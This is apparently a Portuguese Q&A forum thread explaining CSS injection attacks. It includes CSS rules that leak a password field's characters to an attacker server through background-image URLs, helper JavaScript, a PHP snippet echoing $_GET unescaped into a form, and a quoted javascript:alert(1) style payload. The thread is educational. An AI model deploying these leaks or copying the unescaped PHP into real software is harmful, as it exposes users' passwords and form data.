# O que seria um CSS Injection Attacks? O CSS apresenta falhas de segurança?

Tags: css, segurança, navegador-de-internet

Eu estava lendo uma documentação da Mozilla e me deparei com esse termo `CSS Injection Attacks`

Tentei dar uma pesquisada, mas não consegui informações que deixassem claro o que é esse tipo de ataque. Mas fiquei um pouco curioso, pois nunca tinha ouvido falar de vulnerabilidades no CSS!

- Esse tipo de ataque de `CSS Injection Attacks` é algo realmente preocupante?
- Tem algum teste que eu possa fazer para saber se estou vulnerável?
- Existe alguma forma de me prevenir desse tipo de ataque ou de garantir que não vou sofrer esse tipo de ataque?

*Fonte de onde vi o termo:* https://developer.mozilla.org/en-US/docs/Web/CSS/@document

Comment: Boa pergunta. Também nunca tinha visto esse termo. Será que tem alguma coisa a ver com XSS?

Comment: XSS é algo relacionado a cross script? Se for acho que pode ter a ver sim... Eu sou muito leigo nessa área, mas fiquei bem curioso! Só que como eu já não entendo desse tipo de assunto e o pouco que encontrei ainda estava em inglês, ficou complicado entender realmente do que se trata e qual de fato é a técnica. Tb fiquei na dúvida se o próprio browser fica monitorando e bloqueia isso, ou qual tipo de cuidado devemos ter. Achei que seria legal trazer o tópico pra comunidade e ver se alguém tem algum conhecimento para dar umas dicas pra gente :)

Comment: O famoso MySpace Worm foi um ataque via injeção de código por CSS, não foi? Sammy até descreve como o código funciona no website https://samy.pl/myspace/tech.html

Comment: XSS é o mesmo que cross-site-scripting. :)   Acabei achando um artigo ligeiramente interessante sobre [css injection](https://www.netsparker.com/blog/web-security/private-data-stolen-exploiting-css-injection/). Vou tentar pesquisar mais e quem sabe tento elaborar uma resposta. :))

Comment: @LuizFelipe legal jovem, se puder trazer uma resposta didática para quem não é muito da área seria interessante. Esse link que o Andre citou é muito interessante! Fiquei de cara com isso `<div style="background:url('javascript:alert(1)')">` e essa é só o primeiro passo dos 11 que ele descreve lá. Bem interessante mesmo!

Answer (score 12):

CSS Injection é sim um ataque que pode às vezes se tornar preocupante, porém depende bastante da sua aplicação, normalmente aplicações como WordPress em que possibilita o usuário inserir o seu próprio CSS é mais vunerável a esse tipo de ataque, o mais comum de se ver é utilizando o background do CSS, você já deve ter reparado que ele utiliza o parâmetro `url` sendo possível adicionar uma URL externa nesse estilo. Com essa possibilidade é possível *hookar* eventos de teclas e criar um estilo para cada tecla um exemplo.

Se você tem um formulário com um `input` que contenha uma senha:

```html
<input type="password" />
```

Seria possível dessa forma, o invasor injetar um CSS que *hooka* esse evento, ficando dessa forma:

```css
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }

input[type="password"][value$="b"] { background-image: url("http://localhost:3000/b"); }
```

Você adicionando um servidor que ouve essas requisições seria possível saber que a tecla <kbd>a</kbd> foi pressionada, assim como seria possível a tecla <kbd>b</kbd>, <kbd>c</kbd> e assim por diante, é trabalhoso porém é completamente possível criar um *keylogger* em CSS. Também é possível inserir um JavaScript entre outras opções. Caso queira dar uma analisada em um *keylogger* CSS, [veja este link](https://github.com/maxchehab/CSS-Keylogging/blob/master/css-keylogger-extension/keylogger.css).

**Editado**

Para esclarecer os comentários, você necessitaria sim de algo que disparasse o evento, no caso um JavaScript mesmo, mas o que eu quis passar aqui foi a idéia do CSS. Com o código JavaScript adicionado funcionaria o *keylogger*, porém é notório que a falha não é ocorrida pelo JavaScript e sim pela URL do CSS:

```js
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
  inp.setAttribute('value', inp.value)
});
```

E mesmo que não seja adicionado o JavaScript, seria possível sim captar os dados, não atuando como um *keylogger* exatamente, porém ainda funcionando, pois mesmo que o CSS não funcione como um listener, ainda existem formulários que são preenchidos os *values* pelo PHP, exemplo que ainda ocorre hoje em dia:

```html
<form>
  <input type="login" value="<?php echo $_GET['login']; ?>" />
</form>
```

Você também já deve ter reparado que ele só pegará a última letra. Mas a questão aqui é que é sim possível pegar o que digitou, mesmo não sendo a palavra por completo.

Comment: Na verdade não é bem "_a tecla 'a' foi **presisonada**_", já que o CSS não detecta alterações no atributo `value`, somente se for explicitamente colocado no elemento, por exemplo, quando um usuário foi deslogado de um site, mas o site já preenche o seu usuário automaticamente no formulário: `<input ... value="valor" />`. Veja um exemplo [aqui](https://codepen.io/lffg/pen/ErWpKN).

Comment: @LuizFelipe eu já até tinha feito uma pergunta e realmente o CSS não "atualiza" o value no DOM, tanto que eu não consigo estilizar um input dependendo do value que foi digitado, EX: Se o usuário escrever "sim" dentro do input eu não consigo colocar uma borda verde nele, pois o CSS não atualiza o valor da value... Assim como não remove o valor do value que já estava nele quando o dom renderizou... https://pt.stackoverflow.com/questions/349018/%C3%89-poss%C3%ADvel-usar-o-value-do-input-como-seletor-css Mas Anderson, obrigado pela contribuição!

Comment: @LuizFelipe o css não funciona como uma linguagem de programação e eu sei disso, ela não tem um listener ou algo do tipo, a idéia foi passar o css que mostra onde pode ser injetado algo nele, se é necessário adicionar o js eu adiciono. Porém vale ressaltar que é possivel inserir coisas na url do background que é o foco principal da resposta

Answer (score -5):

Sério, eu não me preocuparia com CSS Injection, isso não é novo, já foi consertado várias vezes então se tornou um tipo de injection onde é necessário a soma de erros primários por parte do programador/webdesigner, então minha dica é, esquece isso, isso é raridade.

Comment: Se depende de erros primários do programador/designer, se preocupar com isso é justamente para evitar esses erros. Achei suas colocações meio contraditórias, pois não precisaria tomar cuidado com isso **somente se** já foi tomado o devido cuidado antes e evitados os problemas.